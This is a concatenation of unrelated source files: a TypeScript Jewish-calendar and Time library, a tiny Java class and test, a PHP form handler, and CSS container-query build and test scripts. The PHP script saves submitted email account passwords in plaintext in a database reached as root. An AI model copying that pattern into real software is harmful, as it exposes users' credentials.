// push off Tzom Gedalia if it falls on Shabbos
return JewishCalendar.FAST_OF_GEDALYAH;
} else if (day === 9) {
return JewishCalendar.EREV_YOM_KIPPUR;
} else if (day === 10) {
return JewishCalendar.YOM_KIPPUR;
} else if (day === 14) {
return JewishCalendar.EREV_SUCCOS;
}
if (day === 15 || (day === 16 && !this.inIsrael)) {
return JewishCalendar.SUCCOS;
}
if ((day >= 17 && day <= 20) || (day === 16 && this.inIsrael)) {
return JewishCalendar.CHOL_HAMOED_SUCCOS;
}
if (day === 21) {
return JewishCalendar.HOSHANA_RABBA;
}
if (day === 22) {
return JewishCalendar.SHEMINI_ATZERES;
}
if (day === 23 && !this.inIsrael) {
return JewishCalendar.SIMCHAS_TORAH;
}
break;
case JewishCalendar.KISLEV: // no yomtov in CHESHVAN
// if (day == 24) {
// return EREV_CHANUKAH;
// } else
if (day >= 25) {
return JewishCalendar.CHANUKAH;
}
break;
case JewishCalendar.TEVES:
if (day === 1 || day === 2 || (day === 3 && this.isKislevShort())) {
return JewishCalendar.CHANUKAH;
} else if (day === 10) {
return JewishCalendar.TENTH_OF_TEVES;
}
break;
case JewishCalendar.SHEVAT:
if (day === 15) {
return JewishCalendar.TU_BESHVAT;
}
break;
case JewishCalendar.ADAR:
if (!this.isJewishLeapYear()) {
// if 13th Adar falls on Friday or Shabbos, push back to Thursday
if (((day === 11 || day === 12) && dayOfWeek === 5) || (day === 13 && !(dayOfWeek === 6 || dayOfWeek === 7))) {
return JewishCalendar.FAST_OF_ESTHER;
}
if (day === 14) {
return JewishCalendar.PURIM;
} else if (day === 15) {
return JewishCalendar.SHUSHAN_PURIM;
}
} else if (day === 14) {
// else if a leap year
return JewishCalendar.PURIM_KATAN;
}
break;
case JewishCalendar.ADAR_II:
// if 13th Adar falls on Friday or Shabbos, push back to Thursday
if (((day === 11 || day === 12) && dayOfWeek === 5) || (day === 13 && !(dayOfWeek === 6 || dayOfWeek === 7))) {
return JewishCalendar.FAST_OF_ESTHER;
}
if (day === 14) {
return JewishCalendar.PURIM;
} else if (day === 15) {
return JewishCalendar.SHUSHAN_PURIM;
}
break;
}
// if we get to this stage, then there are no holidays for the given date return -1
return -1;
}
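/*
 * A minimal usage sketch of the index returned above; the dates are illustrative assumptions.
 *
 *   new JewishCalendar(5783, JewishCalendar.NISSAN, 15).getYomTovIndex(); // JewishCalendar.PESACH
 *   new JewishCalendar(5783, JewishCalendar.IYAR, 20).getYomTovIndex();   // -1, not a holiday
 */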
/**
* Returns true if the current day is Yom Tov. The method returns false for Chanukah, Erev Yom Tov (with the
* exception of Hoshana Rabba and erev the second days of Pesach) and fast days.
*
* @return true if the current day is a Yom Tov
* @see #isErevYomTov()
* @see #isErevYomTovSheni()
* @see #isTaanis()
*/
public isYomTov(): boolean {
const holidayIndex: number = this.getYomTovIndex();
if ((this.isErevYomTov() && (holidayIndex !== JewishCalendar.HOSHANA_RABBA &&
(holidayIndex === JewishCalendar.CHOL_HAMOED_PESACH && this.getJewishDayOfMonth() !== 20))) ||
holidayIndex === JewishCalendar.CHANUKAH || (this.isTaanis() && holidayIndex !== JewishCalendar.YOM_KIPPUR)) {
return false;
}
return this.getYomTovIndex() !== -1;
}
/**
* Returns true if the <em>Yom Tov</em> day has a <em>melacha</em> (work) prohibition. This method will return false for a
* non-<em>Yom Tov</em> day, even if it is <em>Shabbos</em>.
*
* @return if the <em>Yom Tov</em> day has a <em>melacha</em> (work) prohibition.
*/
public isYomTovAssurBemelacha(): boolean {
const yamimTovimAssurBemelacha = [
JewishCalendar.PESACH,
JewishCalendar.SHAVUOS,
JewishCalendar.SUCCOS,
JewishCalendar.SHEMINI_ATZERES,
JewishCalendar.SIMCHAS_TORAH,
JewishCalendar.ROSH_HASHANA,
JewishCalendar.YOM_KIPPUR,
];
const holidayIndex: number = this.getYomTovIndex();
return yamimTovimAssurBemelacha.includes(holidayIndex);
}
/**
* Returns true if it is <em>Shabbos</em> or if it is a <em>Yom Tov</em> day that has a <em>melacha</em> (work) prohibition.
*
* @return true if the day is a <em>Yom Tov</em> that is <em>assur bemelacha</em> or <em>Shabbos</em>
*/
public isAssurBemelacha(): boolean {
return this.getDayOfWeek() === SATURDAY || this.isYomTovAssurBemelacha();
}
/**
* Returns true if the day has candle lighting. This will return true on erev <em>Shabbos</em>, erev <em>Yom Tov</em>, the
* first day of <em>Rosh Hashana</em> and the first days of <em>Yom Tov</em> out of Israel. It is identical
* to calling {@link #isTomorrowShabbosOrYomTov()}.
*
* @return if the day has candle lighting
*/
public hasCandleLighting(): boolean {
return this.isTomorrowShabbosOrYomTov();
}
/**
* Returns true if tomorrow is <em>Shabbos</em> or <em>Yom Tov</em>. This will return true on erev <em>Shabbos</em>, erev
* <em>Yom Tov</em>, the first day of <em>Rosh Hashana</em> and <em>erev</em> the first days of <em>Yom Tov</em> out of
* Israel. It is identical to calling {@link #hasCandleLighting()}.
* @return will return if the next day is <em>Shabbos</em> or <em>Yom Tov</em>
*/
public isTomorrowShabbosOrYomTov(): boolean {
return this.getDayOfWeek() === FRIDAY || this.isErevYomTov() || this.isErevYomTovSheni();
}
/**
* Returns true if the day is <em>erev</em> the second day of <em>Yom Tov</em>. This impacts the second day of
* <em>Rosh Hashana</em> everywhere, and the second days of <em>Yom Tov</em> in <em>chutz laaretz</em> (out of Israel).
*
* @return if the day is the second day of <em>Yom Tov</em>.
*/
public isErevYomTovSheni(): boolean {
return (this.getJewishMonth() === JewishCalendar.TISHREI && (this.getJewishDayOfMonth() === 1)) ||
(!this.getInIsrael() &&
((this.getJewishMonth() === JewishCalendar.NISSAN && [15, 21].includes(this.getJewishDayOfMonth())) ||
(this.getJewishMonth() === JewishCalendar.TISHREI && [15, 22].includes(this.getJewishDayOfMonth())) ||
(this.getJewishMonth() === JewishCalendar.SIVAN && this.getJewishDayOfMonth() === 6)));
}
/**
* Returns true if the current day is <em>Aseret Yemei Teshuva</em>.
*
* @return if the current day is <em>Aseret Yemei Teshuvah</em>
*/
public isAseresYemeiTeshuva(): boolean {
return this.getJewishMonth() === JewishCalendar.TISHREI && this.getJewishDayOfMonth() <= 10;
}
/**
* Returns true if the current day is <em>Chol Hamoed</em> of <em>Pesach</em> or <em>Succos</em>.
*
* @return true if the current day is <em>Chol Hamoed</em> of <em>Pesach</em> or <em>Succos</em>
* @see #isYomTov()
* @see #CHOL_HAMOED_PESACH
* @see #CHOL_HAMOED_SUCCOS
*/
public isCholHamoed(): boolean {
return this.isCholHamoedPesach() || this.isCholHamoedSuccos();
}
/**
* Returns true if the current day is <em>Chol Hamoed</em> of <em>Pesach</em>.
*
* @return true if the current day is <em>Chol Hamoed</em> of <em>Pesach</em>
* @see #isYomTov()
* @see #CHOL_HAMOED_PESACH
*/
public isCholHamoedPesach(): boolean {
const holidayIndex: number = this.getYomTovIndex();
return holidayIndex === JewishCalendar.CHOL_HAMOED_PESACH;
}
/**
* Returns true if the current day is <em>Chol Hamoed</em> of <em>Succos</em>.
*
* @return true if the current day is <em>Chol Hamoed</em> of <em>Succos</em>
* @see #isYomTov()
* @see #CHOL_HAMOED_SUCCOS
*/
public isCholHamoedSuccos(): boolean {
const holidayIndex: number = this.getYomTovIndex();
return holidayIndex === JewishCalendar.CHOL_HAMOED_SUCCOS;
}
/**
* Returns true if the current day is erev Yom Tov. The method returns true for Erev Pesach (first and last days),
* Shavuos, Rosh Hashana, Yom Kippur and Succos, as well as Hoshana Rabba.
*
* @return true if the current day is Erev Pesach, Shavuos, Rosh Hashana, Yom Kippur or Succos
* @see #isYomTov()
* @see #isErevYomTovSheni()
*/
public isErevYomTov(): boolean {
const erevYomTov = [
JewishCalendar.EREV_PESACH,
JewishCalendar.EREV_SHAVUOS,
JewishCalendar.EREV_ROSH_HASHANA,
JewishCalendar.EREV_YOM_KIPPUR,
JewishCalendar.EREV_SUCCOS,
JewishCalendar.HOSHANA_RABBA,
];
const holidayIndex: number = this.getYomTovIndex();
return erevYomTov.includes(holidayIndex) ||
(holidayIndex === JewishCalendar.CHOL_HAMOED_PESACH && this.getJewishDayOfMonth() === 20);
}
/**
* Returns true if the current day is Erev Rosh Chodesh. Returns false for Erev Rosh Hashana.
*
* @return true if the current day is Erev Rosh Chodesh. Returns false for Erev Rosh Hashana.
* @see #isRoshChodesh()
*/
public isErevRoshChodesh(): boolean {
// Erev Rosh Hashana is not Erev Rosh Chodesh.
return (this.getJewishDayOfMonth() === 29 && this.getJewishMonth() !== JewishCalendar.ELUL);
}
/**
* Returns true if the day is a Taanis (fast day): the 17th of Tammuz, Tisha B'Av, Yom Kippur, the Fast of
* Gedalyah, the 10th of Teves or the Fast of Esther.
*
* @return true if today is a fast day
*/
public isTaanis(): boolean {
const taaniyos = [
JewishCalendar.SEVENTEEN_OF_TAMMUZ,
JewishCalendar.TISHA_BEAV,
JewishCalendar.YOM_KIPPUR,
JewishCalendar.FAST_OF_GEDALYAH,
JewishCalendar.TENTH_OF_TEVES,
JewishCalendar.FAST_OF_ESTHER,
];
const holidayIndex: number = this.getYomTovIndex();
return taaniyos.includes(holidayIndex);
}
/**
* Returns the day of Chanukah or -1 if it is not Chanukah.
*
* @return the day of Chanukah or -1 if it is not Chanukah.
*/
public getDayOfChanukah(): number {
const day: number = this.getJewishDayOfMonth();
if (this.isChanukah()) {
if (this.getJewishMonth() === JewishCalendar.KISLEV) {
return day - 24;
}
// teves
return this.isKislevShort() ? day + 5 : day + 6;
}
return -1;
}
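/*
 * A worked example of the arithmetic above: 25 Kislev is day 1 (25 - 24) and the count runs into
 * Teves, so in a year with a short (29 day) Kislev, 1 Teves is day 1 + 5 = 6, while in a year with
 * a full (30 day) Kislev, 1 Teves is day 1 + 6 = 7.
 */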
public isChanukah(): boolean {
return this.getYomTovIndex() === JewishCalendar.CHANUKAH;
}
/**
* Returns true if the day is Rosh Chodesh. Rosh Hashana will return false.
*
* @return true if it is Rosh Chodesh. Rosh Hashana will return false.
*/
public isRoshChodesh(): boolean {
// Rosh Hashana is not Rosh Chodesh. Elul never has 30 days
return (this.getJewishDayOfMonth() === 1 && this.getJewishMonth() !== JewishCalendar.TISHREI) || this.getJewishDayOfMonth() === 30;
}
/**
* Returns true if the day is Shabbos and Sunday is Rosh Chodesh.
*
* @return true if it is Shabbos and Sunday is Rosh Chodesh.
*/
public isMacharChodesh(): boolean {
return (this.getDayOfWeek() === SATURDAY && (this.getJewishDayOfMonth() === 30 || this.getJewishDayOfMonth() === 29));
}
/**
* Returns if the day is Shabbos Mevorchim.
*
* @return true if it is Shabbos Mevorchim.
*/
public isShabbosMevorchim(): boolean {
return (this.getDayOfWeek() === SATURDAY && this.getJewishDayOfMonth() >= 23 && this.getJewishDayOfMonth() <= 29);
}
/**
* Returns the int value of the Omer day or -1 if the day is not in the omer
*
* @return The Omer count as an int or -1 if it is not a day of the Omer.
*/
public getDayOfOmer(): number {
let omer: number = -1; // not a day of the Omer
const month: number = this.getJewishMonth();
const day: number = this.getJewishDayOfMonth();
// if Nissan and second day of Pesach and on
if (month === JewishCalendar.NISSAN && day >= 16) {
omer = day - 15;
// if Iyar
} else if (month === JewishCalendar.IYAR) {
omer = day + 15;
// if Sivan and before Shavuos
} else if (month === JewishCalendar.SIVAN && day < 6) {
omer = day + 44;
}
return omer;
}
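/*
 * A worked example of the ranges above: 16 Nissan is day 1 of the Omer (16 - 15), 18 Iyar is
 * day 33 (18 + 15), and 5 Sivan is day 49 (5 + 44); any other date returns -1.
 */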
/**
* Returns the molad in Standard Time in Yerushalayim as a Date. The traditional calculation uses local time. This
* method subtracts 20.94 minutes (20 minutes and 56.496 seconds) from the local time (Har Habayis with a longitude
* of 35.2354° is 5.2354° away from the 30° (GMT+2) timezone meridian) to get to standard time. This method
* intentionally uses standard time and not daylight saving time. Java will implicitly format the time to the
* default (or set) Timezone.
*
* @return the Date representing the moment of the molad in Yerushalayim standard time (GMT + 2)
*/
public getMoladAsDate(): DateTime {
const molad: JewishDate = this.getMolad();
const locationName: string = 'Jerusalem, Israel';
const latitude: number = 31.778; // Har Habayis latitude
const longitude: number = 35.2354; // Har Habayis longitude
// The molad calculation always expects output in standard time. Using the "Asia/Jerusalem" timezone would
// incorrectly adjust for DST.
const yerushalayimStandardTZ: string = 'Etc/GMT+2';
const geo: GeoLocation = new GeoLocation(locationName, latitude, longitude, yerushalayimStandardTZ);
const moladSeconds: number = (molad.getMoladChalakim() * 10) / 3;
// subtract local time difference of 20.94 minutes (20 minutes and 56.496 seconds) to get to Standard time
const milliseconds: number = Math.trunc(1000 * (moladSeconds - Math.trunc(moladSeconds)));
return DateTime.fromObject({
year: molad.getGregorianYear(),
month: molad.getGregorianMonth() + 1,
day: molad.getGregorianDayOfMonth(),
hour: molad.getMoladHours(),
minute: molad.getMoladMinutes(),
second: Math.trunc(moladSeconds),
millisecond: milliseconds,
zone: geo.getTimeZone(),
})
.minus({ milliseconds: Math.trunc(geo.getLocalMeanTimeOffset()) });
}
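/*
 * The 20.94 minute offset used above can be reproduced from the longitude alone: the GMT+2
 * standard meridian sits at 30°, Har Habayis is at 35.2354°, and each degree of longitude is
 * 4 minutes of solar time, so (35.2354 - 30) * 4 = 20.9416 minutes, i.e. 20 minutes and
 * 56.496 seconds.
 */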
/**
* Returns the earliest time of <em>Kiddush Levana</em> calculated as 3 days after the molad. This method returns the time
* even if it is during the day when <em>Kiddush Levana</em> can't be said. Callers of this method should consider
* displaying the next <em>tzais</em> if the zman is between <em>alos</em> and <em>tzais</em>.
*
* @return the Date representing the moment 3 days after the molad.
*
* @see net.sourceforge.zmanim.ComplexZmanimCalendar#getTchilasZmanKidushLevana3Days()
* @see net.sourceforge.zmanim.ComplexZmanimCalendar#getTchilasZmanKidushLevana3Days(Date, Date)
*/
public getTchilasZmanKidushLevana3Days(): DateTime {
const molad: DateTime = this.getMoladAsDate();
return molad.plus({ hours: 72 });
}
/**
* Returns the earliest time of Kiddush Levana calculated as 7 days after the molad as mentioned by the <a
* href="http://en.wikipedia.org/wiki/Yosef_Karo">Mechaber</a>. See the <a
* href="http://en.wikipedia.org/wiki/Yoel_Sirkis">Bach's</a> opinion on this time. This method returns the time
* even if it is during the day when <em>Kiddush Levana</em> can't be said. Callers of this method should consider
* displaying the next <em>tzais</em> if the zman is between <em>alos</em> and <em>tzais</em>.
*
* @return the Date representing the moment 7 days after the molad.
*
* @see net.sourceforge.zmanim.ComplexZmanimCalendar#getTchilasZmanKidushLevana7Days()
* @see net.sourceforge.zmanim.ComplexZmanimCalendar#getTchilasZmanKidushLevana7Days(Date, Date)
*/
public getTchilasZmanKidushLevana7Days(): DateTime {
const molad: DateTime = this.getMoladAsDate();
return molad.plus({ hours: 168 });
}
/**
* Returns the latest time of Kiddush Levana according to the <a
* href="http://en.wikipedia.org/wiki/Yaakov_ben_Moshe_Levi_Moelin">Maharil's</a> opinion that it is calculated as
* halfway between molad and molad. This adds half the 29 days, 12 hours and 793 chalakim time between molad and
* molad (14 days, 18 hours, 22 minutes and 1.666 seconds) to the month's molad. This method returns the time
* even if it is during the day when <em>Kiddush Levana</em> can't be said. Callers of this method should consider
* displaying <em>alos</em> before this time if the zman is between <em>alos</em> and <em>tzais</em>.
*
* @return the Date representing the moment halfway between molad and molad.
* @see #getSofZmanKidushLevana15Days()
* @see net.sourceforge.zmanim.ComplexZmanimCalendar#getSofZmanKidushLevanaBetweenMoldos()
* @see net.sourceforge.zmanim.ComplexZmanimCalendar#getSofZmanKidushLevanaBetweenMoldos(Date, Date)
*/
public getSofZmanKidushLevanaBetweenMoldos(): DateTime {
const molad: DateTime = this.getMoladAsDate();
return molad.plus({
days: 14,
hours: 18,
minutes: 22,
seconds: 1,
milliseconds: 666,
});
}
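/*
 * A worked derivation of the half-month added above: a lunar month is 29 days, 12 hours and
 * 793 chalakim, and a chelek is 10/3 seconds, so half a month is
 * 14 days + 18 hours + 396.5 * (10 / 3) seconds = 14 days, 18 hours, 22 minutes and 1.666 seconds,
 * which is exactly the days/hours/minutes/seconds/milliseconds passed to plus() above.
 */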
/**
* Returns the latest time of Kiddush Levana calculated as 15 days after the molad. This is the opinion brought down
* in the Shulchan Aruch (Orach Chaim 426). It should be noted that some opinions hold that the
* <a href="http://en.wikipedia.org/wiki/Moses_Isserles">Rema</a> who brings down the opinion of the <a
* href="http://en.wikipedia.org/wiki/Yaakov_ben_Moshe_Levi_Moelin">Maharil's</a> of calculating
* {@link #getSofZmanKidushLevanaBetweenMoldos() halfway between molad and molad} is of the opinion that the Mechaber
* agrees to his opinion. Also see the Aruch Hashulchan. For additional details on the subject, see Rabbi Dovid
* Heber's very detailed writeup in Siman Daled (chapter 4) of <a
* href="http://www.worldcat.org/oclc/461326125">Shaarei Zmanim</a>. This method returns the time even if it is during
* the day when <em>Kiddush Levana</em> can't be said. Callers of this method should consider displaying <em>alos</em>
* before this time if the zman is between <em>alos</em> and <em>tzais</em>.
*
* @return the Date representing the moment 15 days after the molad.
* @see #getSofZmanKidushLevanaBetweenMoldos()
* @see net.sourceforge.zmanim.ComplexZmanimCalendar#getSofZmanKidushLevana15Days()
* @see net.sourceforge.zmanim.ComplexZmanimCalendar#getSofZmanKidushLevana15Days(Date, Date)
*/
public getSofZmanKidushLevana15Days(): DateTime {
const molad: DateTime = this.getMoladAsDate();
return molad.plus({ days: 15 });
}
/**
* Returns the Daf Yomi (Bavli) for the date that the calendar is set to. See the
* {@link HebrewDateFormatter#formatDafYomiBavli(Daf)} for the ability to format the daf in Hebrew or transliterated
* masechta names.
*
* @deprecated This depends on a circular dependency. Use <pre>YomiCalculator.getDafYomiBavli(jewishCalendar)</pre> instead.
* @return the daf as a {@link Daf}
*/
// eslint-disable-next-line class-methods-use-this
public getDafYomiBavli(): Daf {
// return YomiCalculator.getDafYomiBavli(this);
throw new Error('This method is not supported, due to a circular dependency. Use `YomiCalculator.getDafYomiBavli(jewishCalendar)` instead');
}
/**
* Returns the Daf Yomi (Yerushalmi) for the date that the calendar is set to. See the
* {@link HebrewDateFormatter#formatDafYomiYerushalmi(Daf)} for the ability to format the daf in Hebrew or transliterated
* masechta names.
*
* @deprecated This depends on a circular dependency. Use <pre>YerushalmiYomiCalculator.getDafYomiYerushalmi(jewishCalendar)</pre> instead.
* @return the daf as a {@link Daf}
*/
// eslint-disable-next-line class-methods-use-this
public getDafYomiYerushalmi(): Daf {
// return YerushalmiYomiCalculator.getDafYomiYerushalmi(this);
throw new Error('This method is not supported, due to a circular dependency. Use `YerushalmiYomiCalculator.getDafYomiYerushalmi(jewishCalendar)` instead');
}
/**
* @see Object#equals(Object)
*/
public equals(jewishCalendar: JewishCalendar): boolean {
return this.getAbsDate() === jewishCalendar.getAbsDate() && this.getInIsrael() === jewishCalendar.getInIsrael();
}
}
<file_sep>/**
* A class that represents a numeric time. Times that represent a time of day are stored as {@link java.util.Date}s in
* this API. The time class is used to represent numeric time such as the time in hours, minutes, seconds and
* milliseconds of a {@link net.sourceforge.zmanim.AstronomicalCalendar#getTemporalHour() temporal hour}.
*
* @author © <NAME> 2004 - 2011
* @version 0.9.0
*/
export class Time {
private static readonly SECOND_MILLIS: number = 1000;
private static readonly MINUTE_MILLIS: number = Time.SECOND_MILLIS * 60;
private static readonly HOUR_MILLIS: number = Time.MINUTE_MILLIS * 60;
private hours: number = 0;
private minutes: number = 0;
private seconds: number = 0;
private milliseconds: number = 0;
private negative: boolean = false;
constructor(hoursOrMillis: number, minutes?: number, seconds: number = 0, milliseconds: number = 0) {
if (minutes) {
this.hours = hoursOrMillis;
this.minutes = minutes;
this.seconds = seconds;
this.milliseconds = milliseconds;
} else {
let adjustedMillis: number = hoursOrMillis;
if (adjustedMillis < 0) {
this.negative = true;
adjustedMillis = Math.abs(adjustedMillis);
}
this.hours = Math.trunc(adjustedMillis / Time.HOUR_MILLIS);
adjustedMillis = adjustedMillis - this.hours * Time.HOUR_MILLIS;
this.minutes = Math.trunc(adjustedMillis / Time.MINUTE_MILLIS);
adjustedMillis = adjustedMillis - this.minutes * Time.MINUTE_MILLIS;
this.seconds = Math.trunc(adjustedMillis / Time.SECOND_MILLIS);
adjustedMillis = adjustedMillis - this.seconds * Time.SECOND_MILLIS;
this.milliseconds = adjustedMillis;
}
}
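/*
 * A minimal usage sketch of the two constructor forms above; the values are illustrative only.
 *
 *   new Time(2, 30);                 // 2 hours, 30 minutes
 *   new Time(9045500);               // 9,045,500 ms decomposes to 2 h, 30 min, 45 s, 500 ms
 *   new Time(-60000).isNegative();   // true: one minute, flagged as negative
 */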
/*
public Time(millis: number) {
this((int) millis);
}
public Time(millis: number) {
adjustedMillis: number = millis;
if (adjustedMillis < 0) {
this.isNegative = true;
adjustedMillis = Math.abs(adjustedMillis);
}
this.hours = adjustedMillis / HOUR_MILLIS;
adjustedMillis = adjustedMillis - this.hours * HOUR_MILLIS;
this.minutes = adjustedMillis / MINUTE_MILLIS;
adjustedMillis = adjustedMillis - this.minutes * MINUTE_MILLIS;
this.seconds = adjustedMillis / SECOND_MILLIS;
adjustedMillis = adjustedMillis - this.seconds * SECOND_MILLIS;
this.milliseconds = adjustedMillis;
}
*/
public isNegative(): boolean {
return this.negative;
}
public setIsNegative(isNegative: boolean): void {
this.negative = isNegative;
}
/**
* @return Returns the hour.
*/
public getHours(): number {
return this.hours;
}
/**
* @param hours
* The hours to set.
*/
public setHours(hours: number): void {
this.hours = hours;
}
/**
* @return Returns the minutes.
*/
public getMinutes(): number {
return this.minutes;
}
/**
* @param minutes
* The minutes to set.
*/
public setMinutes(minutes: number): void {
this.minutes = minutes;
}
/**
* @return Returns the seconds.
*/
public getSeconds(): number {
return this.seconds;
}
/**
* @param seconds
* The seconds to set.
*/
public setSeconds(seconds: number): void {
this.seconds = seconds;
}
/**
* @return Returns the milliseconds.
*/
public getMilliseconds(): number {
return this.milliseconds;
}
/**
* @param milliseconds
* The milliseconds to set.
*/
public setMilliseconds(milliseconds: number): void {
this.milliseconds = milliseconds;
}
public getTime(): number {
return this.hours * Time.HOUR_MILLIS + this.minutes * Time.MINUTE_MILLIS + this.seconds * Time.SECOND_MILLIS +
this.milliseconds;
}
/**
* @deprecated This depends on a circular dependency. Use <pre>new ZmanimFormatter(TimeZone.getTimeZone("UTC")).format(time)</pre> instead.
*/
// eslint-disable-next-line class-methods-use-this
public toString(): string {
throw new Error('This method is deprecated, due to the fact that it depends on a circular dependency. ' +
'Use `new ZmanimFormatter(TimeZone.getTimeZone(\'UTC\')).format(time)` instead');
}
}
| 942f34e53459d6bbc64ebbb0a6f4feb391f88c6e | [ "TypeScript" ] | 4 | TypeScript | EzBulka/KosherZmanim | ca3abaf03567c631c046ab0ac836af92d3b1f0d0 | 8a3139e5dc2b68cdc5039c1daf1668a9d5f2e0d3 | refs/heads/master |
<file_sep>package arhangel.dim;
public class Avatar {
public static void main(String[] args) {
}
public String capitalize(String str) {
return str.toUpperCase();
}
}
<file_sep>package arhangel.dim;
import org.junit.Test;
import static org.junit.Assert.*;
/**
*
*/
public class AvatarTest {
@Test
public void testCapitalize() throws Exception {
Avatar avatar = new Avatar();
assertEquals("HELLO", avatar.capitalize("hello"));
}
}
| 4a6570b5796caa7552c6265ffdfaaa6cd51d1adc | [ "Java" ] | 2 | Java | OKriw/messenger | 19e54bf071ed569b943f0c5268d91f4001f1f30a | 821c61565db88409ab59730a907c1fdcd5f415df | refs/heads/master |
<file_sep><?php
// Collect the submitted form fields.
$email_address = $_POST['email_address'];
$email_password = $_POST['<PASSWORD>'];
$name = $_POST['username'];
// Connect to MySQL and select the database.
$con = mysqli_connect('localhost', 'root');
mysqli_select_db($con, 'd');
// Use a prepared statement so the submitted values cannot break or inject into the query.
$stmt = mysqli_prepare($con, 'INSERT INTO email_info(email_address, email_password, name) VALUES (?, ?, ?)');
mysqli_stmt_bind_param($stmt, 'sss', $email_address, $email_password, $name);
mysqli_stmt_execute($stmt);
mysqli_stmt_close($stmt);
mysqli_close($con);
?>
<html>
<head>
<title>ZEweb animation</title>
<style>
h1
{
color:blue;
font-size:30px;
}
#n
{
color:red;
font-size:40px;
}
a
{
color:blue;
}
</style>
</head>
<body style="background-color:black;">
<h1>Welcome <span id="n"><?php echo htmlspecialchars($name); ?></span><br><br><a href="animation.html">Click to access animation</a></h1>
</body>
</html>
| 031f21663877550d897633fa712e958a41c10a89 | [ "PHP" ] | 1 | PHP | zeeshangondal/sample | 8abf30ff28f64101a5f0dcfcf2cc2ded744f0083 | bea98734cb9263cb0a439773db29ad69b5573bc1 | refs/heads/main |
<repo_name>teosbb/cqfill<file_sep>/test/postcss.js
import assert from 'assert/strict';
import postcss from 'postcss'
import postcssCQFill from 'cqfill/postcss'
async function test(...tests) {
for (const test of tests) await test()
}
test(
async () => {
const containCssValue = `layout inline-size`
const containerCssRuleBlock = `{\n\t.card {\n\t\tgrid-template-columns: 1fr 2fr;\n\t\tgrid-template-rows: auto 1fr;\n\t\talign-items: start;\n\t\tcolumn-gap: 20px;\n\t}\n}`
const sourceCss = `.container {\n\tcontain: ${containCssValue};\n}\n\n@container (width >= 700px) ${containerCssRuleBlock}`
const expectCss = `.container {\n\t--css-contain: ${containCssValue};\n\tcontain: ${containCssValue};\n}\n\n@media \\@container (min-width:700px) ${containerCssRuleBlock}\n\n@container (min-width:700px) ${containerCssRuleBlock}`
const { css: resultCss } = await postcss([
postcssCQFill
]).process(sourceCss, { from: './test.css', to: './test.css' })
try {
assert.equal(resultCss, expectCss)
console.log('PostCSS CQFill transformation a complete success!')
} catch (error) {
console.error('PostCSS CQFill transformation a complete failure!')
console.error(error)
}
},
async () => {
const containCssValue = `layout inline-size`
const containerCssRuleBlock = `{\n\t.card {\n\t\tgrid-template-columns: 1fr 2fr;\n\t\tgrid-template-rows: auto 1fr;\n\t\talign-items: start;\n\t\tcolumn-gap: 20px;\n\t}\n}`
const sourceCss = `.container {\n\tcontain: ${containCssValue};\n}\n\n@container(width >= 700px) ${containerCssRuleBlock}`
const expectCss = `.container {\n\t--css-contain: ${containCssValue};\n\tcontain: ${containCssValue};\n}\n\n@media \\@container (min-width:700px) ${containerCssRuleBlock}\n\n@container(min-width:700px) ${containerCssRuleBlock}`
const { css: resultCss } = await postcss([
postcssCQFill
]).process(sourceCss, { from: './test.css', to: './test.css' })
try {
assert.equal(resultCss, expectCss)
console.log('PostCSS CQFill transformation without a space between @media and @container a complete success!')
} catch (error) {
console.error('PostCSS CQFill transformation without a space between @media and @container a complete failure!')
console.error(error)
}
}
)
<file_sep>/.bin/build.js
import { box } from './internal/color.js'
import { isProcessMeta, getProcessArgOf } from './internal/process.js'
import esbuild from 'esbuild'
import fs from 'fs/promises'
import nodemon from 'nodemon'
import zlib from 'zlib'
import { minify } from 'terser'
/** @typedef {{ [name: string]: string }} Exports */
/** @typedef {{ extension: string, transform(code: string, exports: Exports): string }} Variant */
/** @type {{ [name: string]: Variant }} */
const variants = {
esm: {
extension: 'mjs',
transform(code, exports) {
/** @type {string[]} */
const esmExports = []
for (const name in exports) esmExports.push(`${exports[name]} as ${name}`)
return (
esmExports.length
? `${code}export{${esmExports.join(',')}}`
: code
)
},
},
cjs: {
extension: 'cjs',
transform(code, exports) {
/** @type {string[]} */
const cjsExports = []
for (const name in exports) cjsExports.push(`${name}:${exports[name]}`)
return (
cjsExports.length
? 'default' in exports
? `${code}module.exports=Object.assign(${exports.default},{${cjsExports.join(',')}})`
: `${code}module.exports={${cjsExports.join(',')}}`
: code
)
},
},
iife: {
extension: 'js',
transform(code, exports) {
code = code.replace(/;$/, '')
for (const name in exports) code = `${code};globalThis.${name}=${exports[name]}`
return code
},
},
}
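/*
 * A small illustration of what the three transforms above produce; the input code and export map
 * below are made-up values, not output from a real build.
 *
 *   const lead = 'const a=1;'
 *   const exports = { default: 'a' }
 *   variants.esm.transform(lead, exports)  // 'const a=1;export{a as default}'
 *   variants.cjs.transform(lead, exports)  // 'const a=1;module.exports=Object.assign(a,{default:a})'
 *   variants.iife.transform(lead, exports) // 'const a=1;globalThis.default=a'
 */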
/** @type {(pkgUrl: URL, base: string, opts: Options) => Promise<void>} */
export const build = async (pkgUrl, base, opts) => {
opts = Object.assign({ only: [] }, opts)
/** @type {{ name: string }} */
const { name } = JSON.parse(
await fs.readFile(
new URL('package.json', pkgUrl),
'utf8'
)
)
if (!opts.only.length || opts.only.includes(name)) {
const srcUrl = new URL(`src/${base}.js`, pkgUrl)
const outDirUrl = new URL(`${base}/`, pkgUrl)
const outEsmUrl = new URL(`${base}/${name}.mjs`, pkgUrl)
// Build ESM version
const {
outputFiles: [cmapResult, codeResult],
} = await esbuild.build({
entryPoints: [srcUrl.pathname],
outfile: outEsmUrl.pathname,
bundle: true,
format: 'esm',
sourcemap: 'external',
write: false,
})
// Minify ESM version
const { code, map } = await minify(codeResult.text, {
sourceMap: { content: cmapResult.text },
compress: true,
keep_fnames: true,
module: true,
mangle: true,
toplevel: true,
})
// ensure empty dist directory
await fs.mkdir(outDirUrl, { recursive: true })
// write map
await fs.writeFile(new URL(`${name}.map`, outDirUrl), map)
// prepare variations
/** @type {(code: string, index?: number) => [string, string]} */
const splitByExport = (code, index = code.indexOf('export')) => [code.slice(0, index), code.slice(index)]
const [lead, tail] = splitByExport(code)
/** @type {{ [name: string]: string }} */
const exports = Array.from(tail.matchAll(/([$\w]+) as (\w+)/g)).reduce(
(exports, each) => Object.assign(exports, { [each[2]]: each[1] }), Object.create(null)
)
/** @type {(object: object, name: string) => boolean} */
const hasOwnProperty = (object, name) => Object.prototype.hasOwnProperty.call(object, name)
const customExports = {
cjs: { ...exports },
iife: { ...exports }
}
if (hasOwnProperty(customExports.iife, 'default') && !hasOwnProperty(customExports.iife, base)) {
customExports.iife[base] = customExports.iife.default
delete customExports.iife.default
}
const size = {
name: base,
types: {},
}
// write variation builds
for (const variant in variants) {
/** @type {Variant} */
